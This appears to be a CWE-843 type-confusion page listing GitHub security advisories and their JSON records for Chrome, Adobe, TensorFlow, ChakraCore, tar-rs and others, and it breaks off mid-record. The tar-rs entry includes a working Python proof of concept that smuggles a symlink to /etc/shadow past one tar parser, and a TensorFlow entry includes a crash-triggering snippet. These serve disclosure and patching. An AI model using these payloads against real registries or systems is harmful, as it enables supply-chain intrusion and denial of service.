CWE-843
AllowedAccess of Resource Using Incompatible Type ('Type Confusion')
Abstraction: Base · Status: Incomplete
The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.
1041 vulnerabilities reference this CWE, most recent first.
GHSA-G933-C5V6-98JV
Vulnerability from github – Published: 2022-05-24 17:22 – Updated: 2022-05-24 17:22Adobe Acrobat and Reader versions 2019.012.20035 and earlier, 2019.012.20035 and earlier, 2017.011.30142 and earlier, 2017.011.30143 and earlier, 2015.006.30497 and earlier, and 2015.006.30498 and earlier have a type confusion vulnerability. Successful exploitation could lead to information disclosure.
{
"affected": [],
"aliases": [
"CVE-2019-8251"
],
"database_specific": {
"cwe_ids": [
"CWE-843"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-07-06T18:15:00Z",
"severity": "MODERATE"
},
"details": "Adobe Acrobat and Reader versions 2019.012.20035 and earlier, 2019.012.20035 and earlier, 2017.011.30142 and earlier, 2017.011.30143 and earlier, 2015.006.30497 and earlier, and 2015.006.30498 and earlier have a type confusion vulnerability. Successful exploitation could lead to information disclosure.",
"id": "GHSA-g933-c5v6-98jv",
"modified": "2022-05-24T17:22:25Z",
"published": "2022-05-24T17:22:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8251"
},
{
"type": "WEB",
"url": "https://helpx.adobe.com/security/products/acrobat/apsb19-41.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-G97F-3HRX-C447
Vulnerability from github – Published: 2022-05-13 01:02 – Updated: 2025-10-22 00:31Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.
{
"affected": [],
"aliases": [
"CVE-2017-5070"
],
"database_specific": {
"cwe_ids": [
"CWE-843"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-10-27T05:29:00Z",
"severity": "HIGH"
},
"details": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.",
"id": "GHSA-g97f-3hrx-c447",
"modified": "2025-10-22T00:31:29Z",
"published": "2022-05-13T01:02:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5070"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:1399"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html"
},
{
"type": "WEB",
"url": "https://crbug.com/722756"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201706-20"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-5070"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/98861"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1038622"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GCHP-Q4R4-X4FF
Vulnerability from github – Published: 2026-03-20 17:25 – Updated: 2026-05-19 16:05Summary
As part of CVE-2025-62518 the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.
However, it was missed at the time that this project (the original Rust tar crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.
The problem here is that any discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.
In this case, the tar-rs (Rust tar) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go archive/tar) unconditionally use the PAX size override.
Details
https://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600 https://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344
PoC
(originally posted by https://github.com/xokdvium)
I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:
It seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by astral-tokio-tar but not by tar-rs.
https://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600 https://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344
#!/usr/bin/env python3
B = 512
def pad(d):
r = len(d) % B
return d + b"\0" * (B - r) if r else d
def hdr(name, size, typ=b"0", link=b""):
h = bytearray(B)
h[0 : len(name)] = name
h[100:107] = b"0000644"
h[108:115] = h[116:123] = b"0001000"
h[124:135] = f"{size:011o}".encode()
h[136:147] = b"00000000000"
h[148:156] = b" "
h[156:157] = typ
if link:
h[157 : 157 + len(link)] = link
h[257:263] = b"ustar\x00"
h[263:265] = b"00"
h[148:155] = f"{sum(h):06o}\x00".encode()
return bytes(h)
INFLATED = 2048
pax_rec = b"13 size=2048\n"
ar = bytearray()
ar += hdr(b"./PaxHeaders/regular", len(pax_rec), typ=b"x")
ar += pad(pax_rec)
content = b"regular\n"
ar += hdr(b"regular.txt", len(content))
mark = len(ar)
ar += pad(content)
ar += hdr(b"smuggled", 0, typ=b"2", link=b"/etc/shadow")
ar += b"\0" * B * 2
used = len(ar) - mark
if used < INFLATED:
ar += b"\0" * (((INFLATED - used + B - 1) // B) * B)
ar += b"\0" * B * 2
open("smuggle.tar", "wb").write(bytes(ar))
tar-rs and astral-tokio-tar parse it differently, with astral-tokio-tar skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn't disallow it).
use std::fs;
use std::path::PathBuf;
fn sync_parse(data: &[u8]) {
println!("tar:");
let mut ar = tar::Archive::new(data);
for e in ar.entries().unwrap() {
let e = e.unwrap();
let path = e.path().unwrap().to_path_buf();
let kind = e.header().entry_type();
let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());
match link {
Some(l) => println!(" {:20} {:?} -> {}", path.display(), kind, l.display()),
None => println!(" {:20} {:?}", path.display(), kind),
}
}
println!();
}
async fn async_parse(data: Vec<u8>) {
println!("astral-tokio-tar:");
let mut ar = tokio_tar::Archive::new(data.as_slice());
let mut entries = ar.entries().unwrap();
while let Some(e) = tokio_stream::StreamExt::next(&mut entries).await {
let e = e.unwrap();
let path = e.path().unwrap().to_path_buf();
let kind = e.header().entry_type();
let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());
match link {
Some(l) => println!(" {:20} {:?} -> {}", path.display(), kind, l.display()),
None => println!(" {:20} {:?}", path.display(), kind),
}
}
println!();
}
#[tokio::main]
async fn main() {
let path = std::env::args().nth(1).unwrap_or("smuggle.tar".into());
let data = fs::read(&path).unwrap();
sync_parse(&data);
async_parse(data).await;
}
tar:
regular.txt Regular
smuggled Symlink -> /etc/shadow
astral-tokio-tar:
regular.txt Regular
Impact
This can affect anything that uses the tar crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses astral-tokio-tar to parse, but cargo uses tar.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.4.44"
},
"package": {
"ecosystem": "crates.io",
"name": "tar"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.4.45"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33055"
],
"database_specific": {
"cwe_ids": [
"CWE-843"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-20T17:25:05Z",
"nvd_published_at": "2026-03-20T07:16:13Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nAs part of [CVE-2025-62518](https://www.cve.org/CVERecord?id=CVE-2025-62518) the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.\n\nHowever, it was missed at the time that this project (the original Rust `tar` crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.\n\nThe problem here is that *any* discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.\n\nIn this case, the tar-rs (Rust `tar`) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go `archive/tar`) unconditionally use the PAX size override.\n\n\n### Details\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n### PoC\n\n(originally posted by https://github.com/xokdvium)\n\n\n\u003e I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:\n\nIt seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by `astral-tokio-tar` but not by `tar-rs`.\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n```python\n#!/usr/bin/env python3\nB = 512\n\n\ndef pad(d):\n r = len(d) % B\n return d + b\"\\0\" * (B - r) if r else d\n\n\ndef hdr(name, size, typ=b\"0\", link=b\"\"):\n h = bytearray(B)\n h[0 : len(name)] = name\n h[100:107] = b\"0000644\"\n h[108:115] = h[116:123] = b\"0001000\"\n h[124:135] = f\"{size:011o}\".encode()\n h[136:147] = b\"00000000000\"\n h[148:156] = b\" \"\n h[156:157] = typ\n if link:\n h[157 : 157 + len(link)] = link\n h[257:263] = b\"ustar\\x00\"\n h[263:265] = b\"00\"\n h[148:155] = f\"{sum(h):06o}\\x00\".encode()\n return bytes(h)\n\n\nINFLATED = 2048\npax_rec = b\"13 size=2048\\n\"\n\nar = bytearray()\nar += hdr(b\"./PaxHeaders/regular\", len(pax_rec), typ=b\"x\")\nar += pad(pax_rec)\n\ncontent = b\"regular\\n\"\nar += hdr(b\"regular.txt\", len(content))\nmark = len(ar)\nar += pad(content)\n\nar += hdr(b\"smuggled\", 0, typ=b\"2\", link=b\"/etc/shadow\")\nar += b\"\\0\" * B * 2\n\nused = len(ar) - mark\nif used \u003c INFLATED:\n ar += b\"\\0\" * (((INFLATED - used + B - 1) // B) * B)\nar += b\"\\0\" * B * 2\n\nopen(\"smuggle.tar\", \"wb\").write(bytes(ar))\n```\n\n`tar-rs` and `astral-tokio-tar` parse it differently, with `astral-tokio-tar` skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn\u0027t disallow it).\n\n```rust\nuse std::fs;\nuse std::path::PathBuf;\n\nfn sync_parse(data: \u0026[u8]) {\n println!(\"tar:\");\n let mut ar = tar::Archive::new(data);\n for e in ar.entries().unwrap() {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option\u003cPathBuf\u003e = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) =\u003e println!(\" {:20} {:?} -\u003e {}\", path.display(), kind, l.display()),\n None =\u003e println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\nasync fn async_parse(data: Vec\u003cu8\u003e) {\n println!(\"astral-tokio-tar:\");\n let mut ar = tokio_tar::Archive::new(data.as_slice());\n let mut entries = ar.entries().unwrap();\n while let Some(e) = tokio_stream::StreamExt::next(\u0026mut entries).await {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option\u003cPathBuf\u003e = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) =\u003e println!(\" {:20} {:?} -\u003e {}\", path.display(), kind, l.display()),\n None =\u003e println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\n#[tokio::main]\nasync fn main() {\n let path = std::env::args().nth(1).unwrap_or(\"smuggle.tar\".into());\n let data = fs::read(\u0026path).unwrap();\n sync_parse(\u0026data);\n async_parse(data).await;\n}\n```\n\n```\ntar:\n regular.txt Regular\n smuggled Symlink -\u003e /etc/shadow\n\nastral-tokio-tar:\n regular.txt Regular\n```\n\n### Impact\n\nThis can affect anything that uses the `tar` crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses `astral-tokio-tar` to parse, but cargo uses `tar`.",
"id": "GHSA-gchp-q4r4-x4ff",
"modified": "2026-05-19T16:05:57Z",
"published": "2026-03-20T17:25:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff"
},
{
"type": "WEB",
"url": "https://github.com/composefs/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33055"
},
{
"type": "WEB",
"url": "https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946"
},
{
"type": "PACKAGE",
"url": "https://github.com/alexcrichton/tar-rs"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2026-0068.html"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62518"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "tar-rs incorrectly ignores PAX size headers if header size is nonzero"
}
GHSA-GCPP-P65G-2FX8
Vulnerability from github – Published: 2026-02-03 21:31 – Updated: 2026-02-09 18:30Type Confusion in V8 in Google Chrome prior to 144.0.7559.132 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
{
"affected": [],
"aliases": [
"CVE-2026-1862"
],
"database_specific": {
"cwe_ids": [
"CWE-843"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-03T21:16:12Z",
"severity": "HIGH"
},
"details": "Type Confusion in V8 in Google Chrome prior to 144.0.7559.132 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
"id": "GHSA-gcpp-p65g-2fx8",
"modified": "2026-02-09T18:30:23Z",
"published": "2026-02-03T21:31:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1862"
},
{
"type": "WEB",
"url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop.html"
},
{
"type": "WEB",
"url": "https://issues.chromium.org/issues/479726070"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-1862"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GCVH-66FF-4MWM
Vulnerability from github – Published: 2022-02-10 00:21 – Updated: 2024-11-13 22:31Impact
The implementation of MapStage is vulnerable a CHECK-fail if the key tensor is not a scalar:
import tensorflow as tf
import numpy as np
tf.raw_ops.MapStage(
key = tf.constant(value=[4], shape= (1,2), dtype=tf.int64),
indices = np.array([[6]]),
values = np.array([-60]),
dtypes = [tf.int64], capacity=0, memory_limit=0,
container='', shared_name='', name=None
)
Patches
We have patched the issue in GitHub commit f57315566d7094f322b784947093406c2aea0d7d.
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Faysal Hossain Shezan from University of Virginia. ~
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.7.0"
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.7.0"
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.7.0"
]
}
],
"aliases": [
"CVE-2022-21734"
],
"database_specific": {
"cwe_ids": [
"CWE-617",
"CWE-843"
],
"github_reviewed": true,
"github_reviewed_at": "2022-02-03T19:45:02Z",
"nvd_published_at": "2022-02-03T13:15:00Z",
"severity": "HIGH"
},
"details": "### Impact \nThe [implementation of `MapStage`](https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/map_stage_op.cc#L519-L550) is vulnerable a `CHECK`-fail if the key tensor is not a scalar:\n\n```python\nimport tensorflow as tf\nimport numpy as np\n\ntf.raw_ops.MapStage(\n key = tf.constant(value=[4], shape= (1,2), dtype=tf.int64),\n indices = np.array([[6]]),\n values = np.array([-60]),\n dtypes = [tf.int64], capacity=0, memory_limit=0,\n container=\u0027\u0027, shared_name=\u0027\u0027, name=None\n) \n``` \n\n### Patches\nWe have patched the issue in GitHub commit [f57315566d7094f322b784947093406c2aea0d7d](https://github.com/tensorflow/tensorflow/commit/f57315566d7094f322b784947093406c2aea0d7d).\n\nThe fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution \nThis vulnerability has been reported by Faysal Hossain Shezan from University of Virginia.\n~ ",
"id": "GHSA-gcvh-66ff-4mwm",
"modified": "2024-11-13T22:31:19Z",
"published": "2022-02-10T00:21:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gcvh-66ff-4mwm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21734"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/f57315566d7094f322b784947093406c2aea0d7d"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-58.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-113.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/tensorflow/tensorflow"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/map_stage_op.cc#L519-L550"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "`CHECK`-failures in Tensorflow"
}
GHSA-GG65-289V-HP7M
Vulnerability from github – Published: 2022-01-11 00:01 – Updated: 2022-01-14 00:02There is a Vulnerability of accessing resources using an incompatible type (type confusion) in the MPTCP subsystem in smartphones. Successful exploitation of this vulnerability may cause the system to crash and restart.
{
"affected": [],
"aliases": [
"CVE-2021-40037"
],
"database_specific": {
"cwe_ids": [
"CWE-843"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-10T14:10:00Z",
"severity": "MODERATE"
},
"details": "There is a Vulnerability of accessing resources using an incompatible type (type confusion) in the MPTCP subsystem in smartphones. Successful exploitation of this vulnerability may cause the system to crash and restart.",
"id": "GHSA-gg65-289v-hp7m",
"modified": "2022-01-14T00:02:45Z",
"published": "2022-01-11T00:01:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40037"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2022/1"
},
{
"type": "WEB",
"url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202201-0000001238736331"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-GGVV-6V25-R49R
Vulnerability from github – Published: 2022-05-13 01:20 – Updated: 2023-10-06 01:39A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects ChakraCore. This CVE ID is unique from CVE-2018-8266, CVE-2018-8380, CVE-2018-8381.
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "Microsoft.ChakraCore"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.10.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-8384"
],
"database_specific": {
"cwe_ids": [
"CWE-843"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-21T22:11:50Z",
"nvd_published_at": "2018-08-15T17:29:00Z",
"severity": "HIGH"
},
"details": "A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects ChakraCore. This CVE ID is unique from CVE-2018-8266, CVE-2018-8380, CVE-2018-8381.",
"id": "GHSA-ggvv-6v25-r49r",
"modified": "2023-10-06T01:39:21Z",
"published": "2022-05-13T01:20:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8384"
},
{
"type": "WEB",
"url": "https://github.com/chakra-core/ChakraCore/pull/5596"
},
{
"type": "WEB",
"url": "https://github.com/chakra-core/ChakraCore/commit/765bcd2c801eedc07fd0a4e90f69d41c483aa74a"
},
{
"type": "PACKAGE",
"url": "https://github.com/chakra-core/ChakraCore"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8384"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20210124194908/http://www.securityfocus.com/bid/104981"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/45431"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "ChakraCore RCE Vulnerability"
}
GHSA-GH5F-292C-J673
Vulnerability from github – Published: 2022-05-14 02:22 – Updated: 2023-01-26 15:30Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2016-4223 and CVE-2016-4224.
{
"affected": [],
"aliases": [
"CVE-2016-4225"
],
"database_specific": {
"cwe_ids": [
"CWE-843"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-07-13T02:00:00Z",
"severity": "HIGH"
},
"details": "Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code by leveraging an unspecified \"type confusion,\" a different vulnerability than CVE-2016-4223 and CVE-2016-4224.",
"id": "GHSA-gh5f-292c-j673",
"modified": "2023-01-26T15:30:32Z",
"published": "2022-05-14T02:22:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4225"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2016:1423"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-093"
},
{
"type": "WEB",
"url": "https://helpx.adobe.com/security/products/flash-player/apsb16-25.html"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201607-03"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00016.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-07/msg00017.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/91718"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1036280"
},
{
"type": "WEB",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-427"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GH96-6FQ7-WJH8
Vulnerability from github – Published: 2026-06-30 21:31 – Updated: 2026-06-30 21:31An unauthenticated attacker can crash the worklist server with a single crafted query when the server has a valid Called AE Title / storage directory, the expected lockfile, and at least one matching worklist record.
{
"affected": [],
"aliases": [
"CVE-2026-44628"
],
"database_specific": {
"cwe_ids": [
"CWE-843"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-30T21:16:30Z",
"severity": "HIGH"
},
"details": "An unauthenticated attacker can crash the worklist server with a single crafted query when the server has a valid Called AE Title / storage directory, the expected lockfile, and at least one matching worklist record.",
"id": "GHSA-gh96-6fq7-wjh8",
"modified": "2026-06-30T21:31:45Z",
"published": "2026-06-30T21:31:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44628"
},
{
"type": "WEB",
"url": "https://github.com/DCMTK/dcmtk/releases/tag/latest"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-181-01.json"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-181-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-GJQC-Q9G6-Q2J3
Vulnerability from github – Published: 2022-02-10 00:34 – Updated: 2024-11-07 22:28Impact
A malicious user can cause a denial of service by altering a SavedModel such that any binary op would trigger CHECK failures. This occurs when the protobuf part corresponding to the tensor arguments is modified such that the dtype no longer matches the dtype expected by the op. In that case, calling the templated binary operator for the binary op would receive corrupted data, due to the type confusion involved:
functor::BinaryFunctor<Device, Functor, 1>()(
eigen_device, out->template flat<Tout>(),
input_0.template flat<Tin>(), input_1.template flat<Tin>(),
error_ptr);
If Tin and Tout don't match the type of data in out and input_* tensors then flat<*> would interpret it wrongly. In most cases, this would be a silent failure, but we have noticed scenarios where this results in a CHECK crash, hence a denial of service.
Patches
We have patched the issue in GitHub commit a7c02f1a9bbc35473969618a09ee5f9f5d3e52d9. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
